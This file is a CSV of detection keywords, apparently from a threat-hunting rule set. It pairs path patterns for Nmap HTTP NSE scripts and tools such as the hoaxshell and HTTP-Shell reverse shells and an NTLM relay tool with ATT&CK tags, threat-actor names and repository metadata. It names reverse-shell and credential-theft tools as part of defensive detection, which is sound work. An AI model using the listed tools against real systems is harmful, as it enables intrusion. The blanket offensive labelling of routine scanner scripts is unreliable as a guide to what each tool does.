"*/http-passwd.nse*",".{0,1000}\/http\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7908"
"*/http-phpmyadmin-dir-traversal.nse*",".{0,1000}\/http\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7909"
"*/http-phpself-xss.nse*",".{0,1000}\/http\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7910"
"*/http-php-version.nse*",".{0,1000}\/http\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7911"
"*/http-proxy-brute.nse*",".{0,1000}\/http\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7912"
"*/http-put.nse*",".{0,1000}\/http\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7913"
"*/http-qnap-nas-info.nse*",".{0,1000}\/http\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7915"
"*/http-referer-checker.nse*",".{0,1000}\/http\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7916"
"*/httprelayserver.py*",".{0,1000}\/httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","7917"
"*/http-request-smuggler/*",".{0,1000}\/http\-request\-smuggler\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","7918"
"*/http-rfi-spider.nse*",".{0,1000}\/http\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7919"
"*/http-robots.txt.nse*",".{0,1000}\/http\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7920"
"*/http-robtex-reverse-ip.nse*",".{0,1000}\/http\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7921"
"*/http-robtex-shared-ns.nse*",".{0,1000}\/http\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7922"
"*/https_payload.ps1*",".{0,1000}\/https_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","7923"
"*/http-sap-netweaver-leak.nse*",".{0,1000}\/http\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7924"
"*/http-security-headers.nse*",".{0,1000}\/http\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7925"
"*/http-server-header.nse*",".{0,1000}\/http\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7926"
"*/HTTP-Shell.git*",".{0,1000}\/HTTP\-Shell\.git.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","7927"
"*/http-shellshock.nse*",".{0,1000}\/http\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7928"
"*/http-sitemap-generator.nse*",".{0,1000}\/http\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7929"
"*/http-slowloris.nse*",".{0,1000}\/http\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7930"
"*/http-slowloris-check.nse*",".{0,1000}\/http\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7931"
"*/http-sql-injection.nse*",".{0,1000}\/http\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7932"
"*/https-redirect.nse*",".{0,1000}\/https\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7933"
"*/http-stored-xss.nse*",".{0,1000}\/http\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7934"
"*/http-svn-enum.nse*",".{0,1000}\/http\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7935"
"*/http-svn-info.nse*",".{0,1000}\/http\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7936"
"*/http-tenda-enum.nse*",".{0,1000}\/http\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","7937"
"*/http-title.nse*",".{0,1000}\/http\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7938"
"*/http-tplink-dir-traversal.nse*",".{0,1000}\/http\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7939"
"*/http-trace.nse*",".{0,1000}\/http\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7940"
"*/http-traceroute.nse*",".{0,1000}\/http\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7941"
"*/http-trane-info.nse*",".{0,1000}\/http\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7942"
"*/http-unsafe-output-escaping.nse*",".{0,1000}\/http\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7943"
"*/http-useragent-tester.nse*",".{0,1000}\/http\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7944"
"*/http-userdir-enum.nse*",".{0,1000}\/http\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7945"
"*/http-vhosts.nse*",".{0,1000}\/http\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7946"
"*/http-virustotal.nse*",".{0,1000}\/http\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7947"
"*/http-vlcstreamer-ls.nse*",".{0,1000}\/http\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7948"
"*/http-vmware-path-vuln.nse*",".{0,1000}\/http\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7949"
"*/http-vuln-cve2006-3392.nse*",".{0,1000}\/http\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7950"
"*/http-vuln-cve2009-3960.nse*",".{0,1000}\/http\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7951"
"*/http-vuln-cve2010-0738.nse*",".{0,1000}\/http\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7952"
"*/http-vuln-cve2010-2861.nse*",".{0,1000}\/http\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7953"
"*/http-vuln-cve2011-3192.nse*",".{0,1000}\/http\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7954"
"*/http-vuln-cve2011-3368.nse*",".{0,1000}\/http\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7955"
"*/http-vuln-cve2012-1823.nse*",".{0,1000}\/http\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7956"
"*/http-vuln-cve2013-0156.nse*",".{0,1000}\/http\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7957"
